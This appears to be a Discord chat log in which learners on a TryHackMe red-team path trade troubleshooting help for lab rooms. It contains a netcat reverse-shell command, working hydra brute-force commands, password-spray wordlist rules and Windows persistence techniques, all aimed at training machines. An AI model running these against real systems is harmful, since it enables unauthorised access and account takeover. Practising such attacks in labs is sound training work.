#red-teaming-path

1 messages Β· Page 2 of 1

sand arch
#

Working on the Lateral Movement and Pivoting room, Task 3, I'm having an issue with getting the first reverse shell using runas. Anyone able to help me talk myself through it?

#
$ runas /netonly /user:ZA.TRYHACKME.COM\t1_leonard.summers "c:\tools\nc64.exe -e cmd.exe 10.10.192.173 4443"                                                          

Enter the password for ZA.TRYHACKME.COM\t1_leonard.summers:                                         

Attempting to start c:\tools\nc64.exe -e cmd.exe 10.10.192.173 4443 as user "ZA.TRYHACKME.COM\t1_leonard.summers" ... 
calm gyro
#

Ah, ok. I also tried this and did not work for me because I added also /login-get as you can see in my screenshot. I fix it now and is working, but with :F is running, but not finding the password

#

Another thing that I observed is that I need to write index.php:username instead of index.php?username as it was in the original request

royal void
calm gyro
thin irisBOT
#

Gave +1 Rep to @royal void

patent pawn
#

Currently working on Password Attacks: Task 8. I'm trying to brute force the GET form and I'm stuck with no results. I'm worried I'm not generating the correct password list. These are the rules I'm using for john, applying both to clinic.lst and combining them:

Az"[0-9]" ^[!@#$]

[List.Rules:THM-Custom]
Az"[0-9][0-9]" ^[!@]```
patent pawn
calm gyro
#

You have to use just the simple clinic list for that one πŸ™‚

patent pawn
thin irisBOT
#

Gave +1 Rep to @calm gyro

calm gyro
#

You are welcome! 😁

royal void
#

no problem and nice that abdy is starting to get it too to be able to help others

umbral stratus
#

Just got a Tshirt, thanks thm

frosty creek
#

How should i go about completing the tasks in Task 6 of "Intro to C2"?

#

I've gotten into the computer, but not sure where to go from there

royal void
frosty creek
#

Gah, was hoping i could skip going through that πŸ˜„ I'm impatient since the rewards are limited, heh

thin irisBOT
#

Gave +1 Rep to @royal void

royal void
thin irisBOT
#

Gave +1 Rep to @frosty creek

royal void
#

damn it

frosty creek
#

oof

#

thanks!

royal void
#

did not think the bot would do that

frosty creek
#

and i thought that would work

royal void
#

now shadow has to wait 5 mins to give lassi the thingy

frosty creek
#

ooh, it has a cooldown

royal void
#

limits you to give 1 rep point per 5 mins yeah

#

yeah shadow aims to learn as much as possible from the rooms

#

hence maybe shadow is doing this a lot slower then others

#

though the already completed rooms shadow had that they could speedrun through for tickets was an option at the start

frosty creek
#

Oh no, don't misunderstand. I do read the content and all. I was just hoping it would be more intuitive, as i've been able to do most of it just from individual research and previous knowledge. But i haven't gotten to to metasploit room yet of basic pentesting, so i'm lacking there

grand hull
#

how tf do i access the machine in red team enumeration

patent pawn
#

Doing the last question of password attacks task 8 which is burgess login at /login-post. Is the john single-extra rule really supposed to generate a wordlist of 500k from clinic.lst? That's a honker of a list D:

celest vessel
#

You should indeed have a big list but 500k seems a lot, then again I don't remember exactly because I wrote the output to a file

royal void
celest vessel
#

Pope says good evening to Shadow!

calm gyro
#

Can someone help me with the last one? πŸ˜…

royal void
#

good evening to you to pope

royal void
calm gyro
#

I tried this also

royal void
#

hmm weird then

calm gyro
#

The list of passwords was generated with this command:|| john --wordlist=list.txt --rules=Single-Extra --stdout | tee final2.txt||

#

Where list.txt is the first clinic.list

royal void
#

should have worked then

#

just as a sanity check wc -l final2.txt

frosty creek
#

How long did you let it run, @calm gyro ? I remember having to wait a little bit

celest vessel
#

thats too long

calm gyro
royal void
#

okay then it probably matches shadows list

calm gyro
royal void
#

yuups

#

you know what wc -l does???

calm gyro
royal void
#

for those wondering it is wordcount with the lines param

patent pawn
#

I have the same wordlist it looks and I'm just waiting for hydra to push through πŸ¦₯

celest vessel
#

but why does it take so long?

#

are you running this in the attackbox or on a Kali machine?

patent pawn
#

oh jeez it worked! the first run I tried using sort pass.lst | uniq -u which I think is why it didn't work

royal void
#

worked for shadow.... got the answer from abdy:s ip.... just tested to see if it worked for shadow

#

yes technically shadow should have asked if they were allowed to test it from their machine too

manic shadow
#

+rep @weak ice

thin irisBOT
#

Gave +1 Rep to @weak ice

patent pawn
#

Yeah it worked for me as well. hydra completed in just under 2 minutes

manic shadow
#

there :)

royal void
#

oh thanks inferno

#

almost forgot

manic shadow
#

np

calm gyro
#

Got it nowπŸŽ‰ , I think I just didn't wait enough. I tried more commands because I was still finding issues that I missed

royal void
#

YAY

patent pawn
#

Yep, I was simply just not patient enough as well.

royal void
#

at maximum the attacks of password things against thm machines is supposed to be around 5 mins

#

according to the former thm staff member robertabt

#

also for task 9 shadow recommends creating a password list and user list to use with hydra at the same time to speed up the process

celest vessel
#

was it not mentioned like this in the exercise?

#

at least I also did it like that

royal void
#

think it only showed you to do it 1 password at a time Β―_(ツ)_/Β―

crude burrow
#

Hey can someone help me with task 4 in the password attacks room? In the last question i entered the exact command they want from me and it even matches the hint yet its still not the right answer. The command I entered: crunch 5 5 -t "THM@!" -o tryhackme.txt

celest vessel
#

haha

#

There is a special character for symbols

bitter estuary
#

i was solving this room (https://tryhackme.com/room/phishingyl). but when i start machine from task 5 after the login i cant do anythink (for example i couldnt create new landing page)

#

can anyone help me

royal void
#

lol another one fails at that one

celest vessel
#

I was thinking the same Shadow

crude burrow
#

Oh so im not the only one?

royal void
celest vessel
#

nope it has been asked a couple times already

royal void
celest vessel
#

like I said, there is a special character for symbols

harsh briar
#

i fell for that one too πŸ˜…

bitter estuary
celest vessel
#

read through the documentation again

royal void
crude burrow
royal void
#

no obviously you should do what pope recommended... read the documentation and try and correct the command

crude burrow
#

ok thanks

thin irisBOT
#

Gave +1 Rep to @royal void

celest vessel
#

the command is like almost perfect, it is just a tiny detail πŸ˜„

royal void
#

@ - lower case alpha characters

, - upper case alpha characters

% - numeric characters

^ - special characters including space
is the relevant part of the documentation for you @crude burrow

crude burrow
#

ohhhhh finally got it

#

the word "containing" gave it away

celest vessel
#

yes indeed

royal void
#

great job deadlinkj

crude burrow
#

thanks!

royal void
#

no problem

iron saffron
#

Anyone know why clicking on the 'new profile' doesn't do anything ?

#

Tried google chrome and firefox but no response

iron saffron
thin irisBOT
#

Gave +1 Rep to @spiral forge

lucid plume
#

hi people, getting trouble installing armitage... any help?

#

and problem msfdb init.... asking for doing a variable PGPORT for postgres...

grand heart
#

can you login metasploit? might have to setup the rpc server through metasploit and use the credentials setup on armitage

obtuse bone
royal void
#

worked without problem for shadow from the attackbox

grand heart
lucid plume
thin irisBOT
#

Gave +1 Rep to @obtuse bone

royal void
#

basicly on the attackbox you skip some of the setup steps and just run artimage that is preinstalled

lucid plume
royal void
#

you skip to the starting and connecting to artimage in the setting up artimage section for the attackbox

#

and then it just works

static scroll
#

i am stuck on the question of password attack

royal void
#

task and question???

static scroll
#

it says to use hydra but hydra has a problem with http-get

lucid plume
static scroll
#

task 8 question 3

royal void
static scroll
#

yeah yeah but hydra blocks at 16 tries

#

it's a bug of that version i searched

royal void
#

screenshot of that please???

static scroll
#

and i should update it but kali linux says that the latest version is 8.x when it is 9.2

#

yeah

royal void
#

so does it just stop scrolling after the saturday thingy and never moves further down??

static scroll
#

yes

royal void
#

because tasks are actually threads

static scroll
#

explain please

royal void
#

eugh

#

probably better for you just download the newest kali iso and install that in a new vm and try from there

#

as then you probably will get a newer hydra version

static scroll
#

ok but i don't have internet connection on my kali vm

#

or wait i could try

manic umbra
#

https://tryhackme.com/room/windowslocalpersistence Task 2, last question RID Hijacking, I can't login with the user and password provided. thmuser1 and thmuser2 went fine. Changed the RID to Administrator, was careful to replace the hex number and not to add it (happened to me before). Anyone managed to log in? I was trying with rdp, evil-winrm. All i did was change the RID like described in the description. Did I miss something ?

royal void
#

so yeah probably need an update

static scroll
#

i used the attackbox

#

i guess someone should resolve this problem

grand heart
#

i use a personal kali vm and use openvpn myself

frank scarab
#

you could try sudo apt update && sudo apt upgrade on the attackbox maybe? I'm not sure, I've only used the attackbox a few times

static scroll
#

already tried

royal void
#

also even weirder that you are getting that error on a thingy that only affects 9.1 according to the bug report you linked too

grand heart
#

replace F=Login failed with s=logout.php

static scroll
#

tried, same error

royal void
#

or do not use both the failure and success param at the same time

#

or as shadow stated get the 2022.1 kali build

static scroll
#

so i should use personal vm right?

royal void
#

if you not wanna use the attackbox

#

the attackbox is made to work with basicly all tryhackme rooms so you are fine with it

#

if you feel like it is not laggy or to slow

frank scarab
#

wait I think I see your problem

#

"/login-get get/index.php" should be "/login-get/index.php"

royal void
thin irisBOT
#

Gave +1 Rep to @frank scarab

grand heart
#

good catch the having the sucess and failure pattern probably wont help either

royal void
#

still if you are running hydra versions as far as 1 major version behind maybe it is still time to update

static scroll
frank scarab
#

I have "/login-get/index.php?:[the rest of the command]" in my notes, maybe the ? is necessary too?

royal void
#

nope it is not

frank scarab
#

ok good to know

royal void
#

hydra -l phillips -P clinic.lst 10.10.48.200 http-get-form "/login-get/index.php:username=^USER^&password=^PASS^:S=logout.php" -f

frank scarab
#

how long has that been running? the attackbox might be slow, could take a minute to run through each of the attempts

manic umbra
#

and there are 2 s=logout.php. Also you can use -f in case it find's the password before the 16 tries, if that's a problem

frank scarab
#

well a different ip of course, but otherwise the same

static scroll
manic umbra
#

new IP ?

static scroll
#

oh my machine terminated

#

sorry

manic umbra
#

terget IP

royal void
#

this is why you not copy commands

#

as you used shadows dead ip

static scroll
#

same, cannot connect

#

resolved!

#

thanks

frank scarab
#

nice! what fixed it?

static scroll
#

i was missing somehting i guess

frank scarab
#

awesome

thin irisBOT
#

Gave +1 Rep to @royal void

royal void
#

ah yeah for the rep points you need to reply or ping the user you giving rep to

royal void
static scroll
#

thank you a lot

royal void
#

also

#

!docs verify

wind boneBOT
royal void
#

@frank scarab ⬆️

#

this way you will have a level role and can post screenshots too

frank scarab
royal void
#

also only 1 rep point giveaway per user per 5 mins

frank scarab
#

It looks like it gave you rep the first time I replied so maybe I can't do it twice so quickly but thank you regardless

royal void
#

yuup exactly

frank scarab
#

I feel so official now haha, thanks!

royal void
#

well now you can enjoy the fun too

frank scarab
#

whoa I just won the tryhackme hat! nice!

#

thank you phishing room lol

grand heart
#

im one ticket away from hat 1 month voucher and a pineapple and shirt myself

frank scarab
#

the pineapples are gone unfortunately, I'm one away from that too. I'm one away from the usb rubber ducky but I haven't checked to see if those are gone yet

grand heart
#

awwww 😦 didnt really check if they had a status page on what was in stock lol

frank scarab
#

yeah it's on the page that announced the red team path and the giveaways, the one that has all the ways to get tickets

#

I think there were two pineapples and they went pretty quick, must be some fast people out there lol

royal void
#

or lucky

#

or both'

grand heart
frank scarab
#

Now I know to be ready ahead of time for advent of cyber this year!

grand heart
#

found the page you were talking about

frank scarab
#

Still one more OSEP voucher and 5 rubber duckies left!

obtuse bone
#

This really annoyed me. It wanted a 5 character answer, but had to use 6 chars! What?

royal void
obtuse bone
royal void
#

try and reload the page and check the answer again to see the correct one

thin irisBOT
#

Gave +1 Rep to @royal void

frank scarab
#

pretty sure you don't need the ! though, I got it with|| THM^^||

#

oh nvm, didn't see your response that you already saw that

static scroll
#

can somebody tell me the password of password attacks task 9? i've tried all combinations of season year and special character but it still doesn't work

#

i'm running also one with upppercase first letter now

#

the user must be guess bc it's the last one it remains

frank scarab
#

are your special characters at the end or beginning of the word?

static scroll
#

end

#

as it says

#

or am i wrong?

frank scarab
#

hmmyeah I had it at the end too

#

one sec let me check my notes

#

what command are you using?

#

to create your list

static scroll
#

the rules are

#

Az"19[0-9][0-9]"

frank scarab
#

oh thats why

#

you're only getting years in the 1900s

static scroll
#

and Az"20[0-9][0-9]"

#

nope

#

also 20

frank scarab
#

ahh sorry

#

but what about the special characters?

static scroll
#

oh yes sorry it's also Az"19[0-9][0-9][!@#$]"

#

and Az"20[0-9][0-9][!@#$]"

#

the words are

#

Summer Winter Autumn Spring

#

and

#

summer winter autumn spring

#

should i try other special characters?

frank scarab
#

I don't remember the password but I would add "Fall" to that seasons list, and I had my rules set up slightly different

#

||Az"[2][0][0-9][0-9]" $[!@#$]||

static scroll
#

autumn fall?

#

or others?

frank scarab
#

My seasons list has Summer Winter Fall Spring

static scroll
#

ok i'll try fall

frank scarab
#

I don't think that was in the password, but I only wrote down the flag in my notes not the password so I don't remember for sure lol

#

but the expression you're using for the rules might not be parsing correctly, I think you need brackets to show how many characters there are

#

so you might only be generating 3 digit years if I'm reading it right

#

I could be wrong, regex isn't my strong suit and I'm not sure how johntheripper reads it exactly

static scroll
#

this is some output

frank scarab
#

oh okay perfect

#

that's not getting it though?

static scroll
#

right

frank scarab
#

let me check my bash history, i should have it in there

#

I just did that room this morning

#

Oh I see it, yeah add Fall to your list lol

static scroll
#

I MEAN

patent pawn
#

||[List.Rules:THM-Spray]
Az"202[1-2]" $[!@#$%^&*()]||

I used this rule against a list of:

winter
summer
fall
spring
Winter
Summer
Fall
Spring

static scroll
#

FOR A NON ENGLISH SPEAKER

#

I didn't even know fall existes as a word

#

i'm crying i wasted onee hour

patent pawn
static scroll
frank scarab
#

Yeah I can see how that would send you down a rabbit hole for sure! I'm surprised they didn't use any of the other seasons that are better known haha

#

I didn't even think about Autumn until you mentioned it, so if it was that I would've been in the same position as you wondering what I was doing wrong for hours

#

(although they do mention fall in the examples now that I'm looking it over again)

patent pawn
#

anyone able to help with windows local persistence, flag 13? it involves adding UserInitMprLogonScript to HKCU\Environment with your revshell as the data. I don't see any evidence that UserInitMprLogonScript is being executed at all after logging out and back in, even with simple test scripts.

I found the answer in the #999008613102260275 room

static scroll
#

@frank scarab neither fall functioned

frank scarab
#

and it’s for sure using 2020/2021 in there too?

static scroll
#

no it functioned but it continued going and the limit of scrolling was 516

#

i did it again and it wored

#

THANK YOU BRO

frank scarab
#

Awesome I’m glad you got it !!

vocal hinge
patent pawn
vocal hinge
thin irisBOT
#

Gave +1 Rep to @patent pawn

twin depot
#

guys anyone had issues loading gophish site ?

vocal hinge
twin depot
#

ok let me try that

#

I'm using Kali VM too

patent pawn
thin irisBOT
#

Gave +1 Rep to @patent pawn

torn lodge
thin irisBOT
#

Gave +1 Rep to @patent pawn

onyx charm
#

Hey all, when getting 3 streak freeze tickets, do I have to redeem them straight away? Do they disappear after the 21st of September and how to the streak freezes work? Do they only apply for the next 7 days or does it last forever and stops my streak from restarting on any random 7 days?

twin tundra
#

What am I doing wrong here?

thin irisBOT
#

Gave +1 Rep to @patent pawn

zealous wind
main oyster
twin tundra
#

that is what I was doing initially but but couldnt figure out the two remaining characters, then i though it wanted the command for a list that would happen to have THM@! in it idk

zealous wind
#

Remove the -o and have the output prints to the console see how it looks like

#

it will help you out

twin tundra
#

@zealous wind this is the hint btw

zealous wind
#

yes, the "options" should contains the phrase to generate the right output

main oyster
#

mayb with ||^^|| insead

twin tundra
#

@zealous wind I have generated a wordlist with the required text tho? confused af

main oyster
#

look at this

twin tundra
#

the hint says 5 5, is that meant to be exact or like an example

zealous wind
#

@late marsh the answer should also be quoted otherwise you have spaces and thats not what you want

main oyster
twin tundra
#

@main oyster I know that, was wondering if the 'hint' showed the exact or an example

twin tundra
#

right

#

the wording is tripping me out

main oyster
twin tundra
#

so it doesnt want a list that happens to contain THM@!

main oyster
twin tundra
main oyster
twin tundra
#

the answer format '*" literally had two extra Asterix's

#

which is just rude

#

i did ,,,^^ which is just a loooooooong version of THM^^

#

thanks lmao

main oyster
primal basin
#

Alright I'm in the room active directory basics,
Where I'm supposed to reset Sophie's password, and set it for her to change her password on log on,
So Now I logged in as sophie and trying to set the new password but it's keeps saying password doesn't match , I'm 100% sure my passwords match

lucid plume
#

how can i take or put aallll --stdout from hydra list rules and put it in a file?

zealous wind
lucid plume
#

oh... i tried without stdout and work

mystic sage
#

try with just the redirect > and not the flag?

#

that way the ool output will just be written to the file

#

you can do some clever stuff like > file.txt & tail -f file.txt if you want to monitor its progress & read it as it happens

lucid plume
#

already tried http-post-form and didnt work either...

primal basin
#

looks okay

#

c is Caps

#

@zealous wind you had this same issue right ?

lucid plume
#

c?

mystic sage
#

yeah maybe typo in the pass? best way to check is copy & paste rather than typing - though you might have already done this

lucid plume
#

nope... caps are not the problem

zealous wind
#

check the condition

#

and change the the HTTP method (if you are at the step of the challenge)

#

and make sure you are using the right list with the right rule πŸ˜‰

lucid plume
#

already change it to post

#

lookin on the condition

lucid plume
#

maybe is the condition

primal basin
lucid plume
primal basin
#

what first one

lucid plume
lucid plume
zealous wind
#

no

#

try going for positive and not negative

primal basin
primal basin
lucid plume
lucid plume
zealous wind
#

your syntax is wrong

#

condition is right, but look again

#

you are missing something

lucid plume
lucid plume
zealous wind
lucid plume
zealous wind
#

look at how the success condition should look like

lucid plume
#

the previous was logout.php, but it was like this on thm...

zealous wind
#

the success condition dose not change between tasks

lucid plume
#

oooh got it!!!!

#

finally!!!

zealous wind
unique rain
#

Basic maths i was dumb πŸ˜‚

robust skiff
#

hey...

#

room thelayoftheland task 9 dns question...

#

I am trying to perform AXFR query but I get Query refused because of security settings..

#

what am I doing wrong?

lucid plume
#

souldnt be that the pass?

robust skiff
lucid plume
robust skiff
native berry
robust skiff
#

just 2020 and 2021

main oyster
#

and if u are dealing with symbols use ' ' around the pass

robust skiff
lucid plume
#

well.. i thought may be the same on the task

native berry
robust skiff
#

I can't send pics but yes I am in the windows machine

native berry
robust skiff
#

oh forgot to sorry

#

1m

native berry
#

!docs verify

wind boneBOT
robust skiff
thin irisBOT
#

Gave +1 Rep to @native berry

lucid plume
#

what is wrong here?

tawdry inlet
lucid plume
#

password spray last task

celest vessel
#

Hm you only have passwords with ! As symbol?

#

I don't recall the symbol by heart but I think you can try others

lucid plume
#

got it with /@

celest vessel
#

And still no succes?

tawdry inlet
#

I think he meant "got it" as in succeeded

celest vessel
#

Aah ok

lost linden
#

man is this hanging for anyone else?

#

just used || snmpwalk -v2c -c public <Machine ip>|| and it worked

robust skiff
#

it's 1 char but it's not supposed to be !

lucid plume
robust skiff
#

ok

lucid plume
#

doing pishing now

tropic ginkgo
#

Hi there, I'm stuck at SandBox Evasion Challange. I can either pass the sleep check or memory,network and geofilter checks but not both. Do you have any idea where might be the problem? angryping

zealous wind
#

anyone has any idea why i cant post pictures in the channel?

#

when i drag and drop an image in other channels it works but here nothing happens

#

weird

native berry
#

!docs verify

wind boneBOT
zealous wind
thin irisBOT
#

Gave +1 Rep to @native berry

zealous wind
#

Windows Local Persistence - Task 2: can anyone point out what I'm missing here? I'm opening a text file but get no shell, the script works though. tried with quates and without

gentle wraith
#

in the phising room, does the gophish page work for you? it refused to load for me

manic umbra
#

That's the attempt to login and the error message I get. After changing the RID with regedit. I've tried some techniques from the other users too, like assigning it to groups or privileges for Backup Operators. Changed the password for thmuser3 too. No login

#

Ok, it worked now. I was using remmina and I've edited an existing connection I had. After I've added a new connection and didn't use an existing but edited connection, it worked. I'll have to redo the whole room to see if that really was why it didn't work

manic umbra
manic umbra
manic umbra
#

And check with dir if the backdoor script has the right extension. ps1 not ps1.txt like windows likes to add an extension by itself

tawdry inlet
#

Why doesnt the ssh has the user token? do I always need to use runas? I mean I already entered the credentials in the SSH login, and whoami shows the exact same user, im a bit confused here

#

nevermind they wanted me to use a different user's credentials

#

Although im getting an access denied error:

#

How I created the shell:

manic umbra
#

strange, this one worked for me without problems, maybe a machine restart will resolve it

zealous wind
#

yeah, trying

manic umbra
#

if it's only about the flag and if it works on the command line, you can get the flag and revisit the task later

zealous wind
#

Sorry! You are still missing something. No flag for you yet. (6)

#

and i cant get the damn thing to run via registry

manic umbra
#

It definitely works. Double check the backdoor PS1 file, the extension , the registry entry. I didn't do anything different than how it's described on the page

zealous wind
#

Script

#

extension

#

registry entry

#

what am i missing? looks legit to me

manic umbra
#

seems legit to me too

vital haven
#

Hey @zealous wind

#

Are you sure about the registry path

#

You are probably editing the textfile not txtfile

#

Can you verify the registry path real quick

zealous wind
vital haven
#

Yeah you know how i know that πŸ«’πŸ˜‚

#

Got stuck on the same place for a while

zealous wind
#

Thought so.....

vital haven
#

Keep it up πŸ‘πŸ»

zealous wind
#

happened to me more then i can count πŸ˜„

#

thanks for pointing it out!

vital haven
celest vessel
#

hahaha sometimes the fatigue kicks in after a working day, I was trying to find why it was not working, in the end I forgot to start the VPN πŸ˜…

celest vessel
#

hm is it because all prizes are claimed it is so calm here? πŸ˜„

low igloo
#

I too man, did you answered already ?

unique rain
#

neither the binary leaked or the flag ?

#

from evasion logging room

unique rain
#

ok fine i found it lol

stable orbit
stable orbit
#

Yeah was digging around but wasn't sure if there might actually be something wrong or if it was juat people blaming the task.

warm wharf
#

Anyone have issues on Password Attacks toon, task 8, last question? Got everyone one else of them done but can’t seem to make headway in it

lucid plume
#

20 times doing this... the machine never do the task
go to sleep.... let me know if anybody has the same problem or in this room the machin isnt workin well...

tight granite
#

Gm fam

tropic ginkgo
#

is there an issue on windows privesc under red team path? can't connect to the machine via rdp

tropic ginkgo
#

Im using my kali to connect, then xfreerdp

wind boneBOT
tropic ginkgo
#

hello mate, here's the screenshot

#

can't paste the image here...

tropic ginkgo
#

I was able to access it now using attackedbox

#

Thanks mate

dusk berry
#

hii can anyone help me

#

rooo name red team

#

Evading Logging and Monitoring

#

task 10

#

Enter the flag obtained from the desktop after executing the binary.

#

i tried many times to solve this problem

#

please anyone help me

calm gyro
#

Hello, any solution for the gophish website? Is loading and I can not access the features

calm gyro
celest vessel
#

the public one seems to be having issues from time to time

calm gyro
#

I tried from my Kali machine on Firefox and Chronium and didn't work. From the Kali Attack Machine on THM was working fine

celest vessel
#

but what IP address did you use to access the goPhish site

#

because I also used a Kali machine and it worked just fine by accessing it via the localhost

calm gyro
vast quest
#

Did you uh, start the machine?

calm gyro
vast quest
#

Why?

celest vessel
#

hmm

calm gyro
#

I know there is no risk, but I do it out of habitπŸ˜…

#

I can share with you if you want to test it

celest vessel
#

btw

#

I believe if you are connected over vpn you can remove the thmlabs.com in the link

#

only machine_ip:8443

calm gyro
#

So the website is reachable, but is not loading. Like this:

celest vessel
#

:/

calm gyro
#

But is ok, I already wrote here that I was able to made the tasks using the Attack Machine from the website πŸ˜„

celest vessel
#

I still would like to understand why it is not working

#

because it worked fine for me πŸ˜„

tawdry inlet
#

err xD

tawdry inlet
#

Why is the file missing?

torn lodge
#

In Task 4 of Network Security Solutions it asks how you would go about setting up a ncat session to listen on the Telnet port... not sure what I'm missing on my answer. How did you think through that question?

celest vessel
#

We don't see your answer, so that's difficult to help

torn lodge
#

nvm... I got it... I kept using the UDP option for no good reason

celest vessel
marsh birch
#

Hi guys!! I'm doing the "passwordattacks" room and I'm having problemas with the question "Perform a brute-forcing attack against the phillips account for the login page at http://10.10.188.218/login-get using hydra? What is the flag?"

I'm trying to brute force the user with the custom wordlist made with words of https://clinic.thmredteam.com/ in raw and It doesn't work. I need to use a rule-based attack?

celest vessel
#

can you show us the command you are using?

marsh birch
#

Of course!

#

hydra -l phillips -P clinic.lst 10.10.188.218 http-get-form "/login-get/index.php:username=^USER^&password=^PASS^:F=Login failed!" -f

celest vessel
#

did you check the contents of the clinic.lst?

#

is everything populated?

marsh birch
#
105```
#

./cewl.rb -m 8 -w clinic.lst https://clinic.thmredteam.com/

#

The rule-based attack in the SMTP question with the same wordlist worked

celest vessel
#

hmm

#

I also don't immediately see the problem

marsh birch
#

I'm going to try to restart the VM...

#

If not, I cant try from the attackbox, I had some problems these days from my laptop for some reason

celest vessel
#

the only thing is, I have just used cewl rather than cewl.rb

thin irisBOT
#

Gave +1 Rep to @celest vessel

celest vessel
#

I could check what my clinic.lst contains

marsh birch
#
protected
Research
Oxytocin
Paracetamol
Cortisol
appointment
Cardiology
February
providing
treatment
commonly
hospital
Template
tooplate
Pregnancy
Saturday
Copyright
Laboratory
Departments
Insurance
healthier
Exercise
customised
Lifestyle
Balanced
nutrition
Benefits
clinical
innovative
technology
experience
multidisciplinary
surgeons
researchers
specialists
together
medicine
pressing
findings
medicines
treatments
President
Weronika
Phillips
released
reaction
connections
stressful
situations
reliever
alleviate
referred
response
APPOINTMENT
Department
Additional
location
affiliated
professionals
establishing
maintaining
qualified
physicians
committed
tailored
specific
requirements
official
Medicalmedical
porttitor
imperdiet
vestibulum
molestie
Phasellus
vulputate
Vestibulum
vehicula
placerat
venenatis
eleifend
Technology
Consultant
thmredteam
Professional
interdum
condimentum
pellentesque
fringilla
volutpat
tincidunt
Maecenas
lobortis
facilisis
pulvinar
dignissim
Suspendisse
Facebook
maecenas
voluptate
Introducing
Categories
pharetra
Curabitur
consequat
ultricies
#

Could be a case-sensitive problem?

celest vessel
#

wait

#

I do see a typo

#

You use F=Login-failed

#

what if you try S=Login-failed ?

#

@marsh birch ?

marsh birch
#

That means it will stop when the text is founded, isn't it?

celest vessel
#

it means it should show you the valid credentials in case of success

marsh birch
#

It doesn't work. It stops at the beginning of the wordlist and the password isn't correct

#

Because found the text "Login Failed"

#
hydra -l phillips -P clinic.lst 10.10.173.10 http-get-form "/login-get/index.php:username=^USER^&password=^PASS^:S=Login failed!" -f
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-09-14 15:58:45
[DATA] max 16 tasks per 1 server, overall 16 tasks, 105 login tries (l:1/p:105), ~7 tries per task
[DATA] attacking http-get-form://10.10.173.10:80/login-get/index.php:username=^USER^&password=^PASS^:S=Login failed!
[80][http-get-form] host: 10.10.173.10   login: phillips   password: protected
#

"protected" is the first entry of the wordlist

#

And isn't the password for phillips

celest vessel
#

try S=Logout.php

#

and not login failed

marsh birch
#

It works!

celest vessel
#

yesh!

marsh birch
#

But how could I know this is going to be the redirected page if I don't have valid credentials to test it?

#

I mean, I don't have the information of how is the webpage when a user is logged, so how could I solve this question without this information?

celest vessel
#

well this is a practice environment

#

in reality you would have to enumerate such information

marsh birch
#

Ok thanks!!

celest vessel
#

no problem

marsh birch
#

Sorry for asking again, I'm having problems doing this room. How can I guess the password in the "Password spray attack" part?

#

I tried with the one in the example but it doesn't work, and the hint is too much to guess. I need to create a wordlist with this wildcard?

celest vessel
#

yes

#

you need to a username list

#

and a password list

#

using hydra

celest vessel
#

so the exercise is challenging you to reuse the tools you have learned

marsh birch
#

Ok, I didn't know I need to creat a password list too. Thanks!

marsh birch
#

My wordlist has near 8000 entries and I used years from 2010 and this special characters: !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~ The task is taking too much time, any suggestion?

echo ore
marsh birch
#

I've reduced the special characters to !@

marsh birch
red tangle
#

What is the first access type mentioned in the document?
Any ideas?

native berry
celest vessel
red tangle
#

Never mind I download not the right file lol

#

Rules of engagement

#

Red team engagement

celest vessel
#

Did you use capital letters? πŸ˜‰

marsh birch
#

Nop................

celest vessel
#

Hehehe

marsh birch
#

OMG jajajaj I'm gonna try it

celest vessel
#

It took my quite a while to find out

marsh birch
#

It's true that in the examples they start in caps

celest vessel
#

It should take less than a minute to hit the answer

marsh birch
#

Yeah it works 😁

#

🀟

celest vessel
#

Haha good for you 😁

jade parcel
#

All prizes redeemed already, much faster then 21st πŸ˜„ super cool, still the path is awesome even though that tickets are out of the game πŸ˜„

slim fern
#

same problem here but i is there a john the ripper rule to like add all of this to years?

royal void
slim fern
#

task 9

#

password attacks

royal void
#

yuup that is the one

slim fern
#

ty

#

and how did u generate it?

royal void
#

manually.....

marsh birch
#

Yeah, with a python script in my side

slim fern
#

i was trying so hard to avoid it

marsh birch
#

Bad luck

royal void
#

eh it was quick to do with copy and pasting and sublime text regex stuffs and replace

marsh birch
#

Sublime hacks jajaaj

slim fern
#

sublimetext>>> mousepad

#

got a pass

#

ty

#

+rep @royal void

thin irisBOT
#

Gave +1 Rep to @royal void

royal void
#

no problem

slim fern
#

reedemed the red teamer prize

#

ty

vast quest
#

You need to verify πŸ˜„

calm gyro
calm gyro
# celest vessel and a password list

I really think that this task is not as it should be. Because the idea of spraying attack is not to focus on a list of passwords and to focus on one common password. Even if the hint is season + year + symbol, the password should be simple, but instead of that I remember I was trying a lot finding the right password and I was put in the situation to make again a rule list of a lot of passwords. In this case the practical part is not focus on spraying attack anymore...

celest vessel
# calm gyro I really think that this task is not as it should be. Because the idea of sprayi...

I don't really follow you, I do see this task as a password spray. You are spraying "a password" to all the users. Since the password is not the right one you go onto the next password spray and so on until you get at hint. I believe sometimes the explanation at the exercises is not always as it should be. This last task was a combination of multiple aspect, I found it very interesting, except for the part when I realized there are also capital letters πŸ˜…πŸ™ˆ

calm gyro
celest vessel
#

Maybe not but if it would work with a given password the task would maybe have been a bit light

#

I don't know, like I said, sometimes the questions are a bit weird

spare mulch
#

why does it keep hanging here

#

i was having issues with armitage which is why im using meterpreter

#

armitage said this initally

#

and then armitage never worked

#

i mean i can launch it

native berry
spare mulch
spare mulch
native berry
spare mulch
#

just tun0

#

lo eth0 and tun0

native berry
# spare mulch just tun0

If your attacking machine is a VM, do you have any personal VPN running on the machine that is hosting your kali ?

spare mulch
#

Ah that reminds me

#

ur right i forgot i had a vpn running on my personal machine

#

i had it on for 2 seconds and forgot abt it

native berry
#

k

spare mulch
#

should i restart my vpn script?

#

after turning off host vpn

native berry
spare mulch
#

so i accidentally closed the tab and run the script again

#

so now i have two tun

#

with both the same vpn ip

#

how do i get rid of one

native berry
#

sudo killall openvpn

spare mulch
#

ah

native berry
#

And connect again after that

spare mulch
#

hm still seems to hang

native berry
#

Give it a 2 - 3 mins

spare mulch
#

okay

native berry
#

If nothing changes, you could also try sudo ip link set dev tun0 mtu 1200

spare mulch
#

It worked

#

thanks for the help

jade flume
#

Hey friends how y’all doing I need help with windows persistence task 4 abusing services after trying to create a service and while trying to execute I get this error = the service didn’t response to the start or control request in a timely fashion what I’m I doing wrong and do you all have to start the room all over again just cause you are not able to finish it and you won’t be able to retrieve the next flag cause you didn’t retrieve the last one just asking cause I had to start this over and over again cause I can’t finish it all at once

torn lodge
#

I'm kind of confused about Task 6 of the Password Attacks room... anyone else on the same boat? The question asks for "S[Word]NN where S is special symbol (!@) and N is a number [0-9]... what is that rogue " at the beginning?

jade flume
torn lodge
thin irisBOT
#

